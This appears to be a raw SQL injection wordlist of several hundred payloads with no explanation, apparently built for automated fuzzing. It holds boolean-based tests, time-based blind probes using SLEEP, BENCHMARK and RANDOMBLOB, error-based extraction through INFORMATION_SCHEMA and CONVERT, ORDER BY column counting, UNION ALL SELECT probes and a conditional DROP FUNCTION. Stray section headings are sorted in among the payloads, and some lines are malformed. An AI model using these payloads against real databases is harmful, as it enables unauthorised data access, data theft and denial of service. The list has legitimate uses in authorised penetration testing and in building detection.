AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
AND 0
AND 1
AND 1083=1083 AND ('1427=1427
AND 1083=1083 AND (1427=1427
AND 1=0
AND 1=0 AND '%'='
AND 1=0#
AND 1=0--
AND 1=1
AND 1=1 AND '%'='
AND 1=1#
AND 1=1--
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
AND 7300=7300 AND 'pKlZ'='pKlY
AND 7300=7300 AND 'pKlZ'='pKlZ
AND 7300=7300 AND ('pKlZ'='pKlY
AND 7300=7300 AND ('pKlZ'='pKlZ
AND 7506=9091 AND ('5913=5913
AND 7506=9091 AND (5913=5913
AND false
AND true
AS INJECTX WHERE 1=1 AND 1=0
AS INJECTX WHERE 1=1 AND 1=0#
AS INJECTX WHERE 1=1 AND 1=0--
AS INJECTX WHERE 1=1 AND 1=1
AS INJECTX WHERE 1=1 AND 1=1#
AS INJECTX WHERE 1=1 AND 1=1--
AnD SLEEP(5)
AnD SLEEP(5)#
AnD SLEEP(5)--
Comments:
Finding the table name
HAVING 1=0
HAVING 1=0#
HAVING 1=0--
HAVING 1=1
HAVING 1=1#
HAVING 1=1--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/
OR 1=0
OR 1=0#
OR 1=0--
OR 1=1
OR 1=1#
OR 1=1--
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 3409=3409 AND ('pytW' LIKE 'pytW
OR 3409=3409 AND ('pytW' LIKE 'pytY
OR x=x
OR x=x#
OR x=x--
OR x=y
OR x=y#
OR x=y--
ORDER BY 1
ORDER BY 1#
ORDER BY 1,SLEEP(5)
ORDER BY 1,SLEEP(5)#
ORDER BY 1,SLEEP(5),3#
ORDER BY 1,SLEEP(5),3,4#
ORDER BY 1,SLEEP(5),3,4--
ORDER BY 1,SLEEP(5),3--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--
ORDER BY 1,SLEEP(5)--
ORDER BY 1--
ORDER BY 10
ORDER BY 10#
ORDER BY 10--
ORDER BY 11
ORDER BY 11#
ORDER BY 11--
ORDER BY 12
ORDER BY 12#
ORDER BY 12--
ORDER BY 13
ORDER BY 13#
ORDER BY 13--
ORDER BY 14
ORDER BY 14#
ORDER BY 14--
ORDER BY 15
ORDER BY 15#
ORDER BY 15--
ORDER BY 16
ORDER BY 16#
ORDER BY 16--
ORDER BY 17
ORDER BY 17#
ORDER BY 17--
ORDER BY 18
ORDER BY 18#
ORDER BY 18--
ORDER BY 19
ORDER BY 19#
ORDER BY 19--
ORDER BY 2
ORDER BY 2#
ORDER BY 2--
ORDER BY 20
ORDER BY 20#
ORDER BY 20--
ORDER BY 21
ORDER BY 21#
ORDER BY 21--
ORDER BY 22
ORDER BY 22#
ORDER BY 22--
ORDER BY 23
ORDER BY 23#
ORDER BY 23--
ORDER BY 24
ORDER BY 24#
ORDER BY 24--
ORDER BY 25
ORDER BY 25#
ORDER BY 25--
ORDER BY 26
ORDER BY 26#
ORDER BY 26--
ORDER BY 27
ORDER BY 27#
ORDER BY 27--
ORDER BY 28
ORDER BY 28#
ORDER BY 28--
ORDER BY 29
ORDER BY 29#
ORDER BY 29--
ORDER BY 3
ORDER BY 3#
ORDER BY 3--
ORDER BY 30
ORDER BY 30#
ORDER BY 30--
ORDER BY 31337
ORDER BY 31337#
ORDER BY 31337--
ORDER BY 4
ORDER BY 4#
ORDER BY 4--
ORDER BY 5
ORDER BY 5#
ORDER BY 5--
ORDER BY 6
ORDER BY 6#
ORDER BY 6--
ORDER BY 7
ORDER BY 7#
ORDER BY 7--
ORDER BY 8
ORDER BY 8#
ORDER BY 8--
ORDER BY 9
ORDER BY 9#
ORDER BY 9--
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)#
ORDER BY SLEEP(5)--
PRINT
PRINT @@variable
RANDOMBLOB(1000000000/2)
RANDOMBLOB(500000000/2)
RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
Time-Based:
UNION ALL SELECT
UNION ALL SELECT 'INJ'||'ECT'||'XXX'
UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
